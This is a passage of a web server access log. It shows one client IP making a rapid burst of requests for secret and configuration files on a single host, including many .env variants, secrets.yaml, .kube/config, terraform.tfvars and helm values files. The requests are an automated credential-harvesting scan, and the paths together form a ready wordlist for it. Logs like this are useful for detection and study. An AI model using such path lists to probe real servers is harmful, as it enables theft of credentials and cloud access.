Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/django/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/symfony/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/html/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_3" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.8" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.v8" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/rust/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/supabase/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/var/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-06" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/web/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.old14" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_15" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/configuration/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/cart/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/railway/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/checkout/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.old17" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202405" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/digitalocean/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/core/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/secrets/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/logs/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak9" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202409" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/k8s/secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/v3/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/config/.env.local" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.old18" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-02" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.netlify/state.json" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.7" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.old6" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_9" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.old9" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.vercel/project.json" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/kubernetes/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/iac/terraform.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202410" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.idea/dataSources.xml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2026-01" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_14" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202411" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.13" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/infrastructure/terraform.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.v12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/helm/values.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202601" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.v15" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/solid/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/admin/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.development.local" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.swp" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/secrets.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/settings/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.18" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202510" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_17" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_prod" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak2" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.6" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/rails/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.008" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_16" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_2026" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/public/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.010" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.007" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.kube/config" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.test" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/fly/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-07" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_old" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.006" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup.2025" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.15" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/cms/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/data/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/wp-content/plugins/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/output/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/nextjs/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak7" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.docker/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.v4" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/helm/values-prod.yaml" [Client 216.81.248.135] [Length 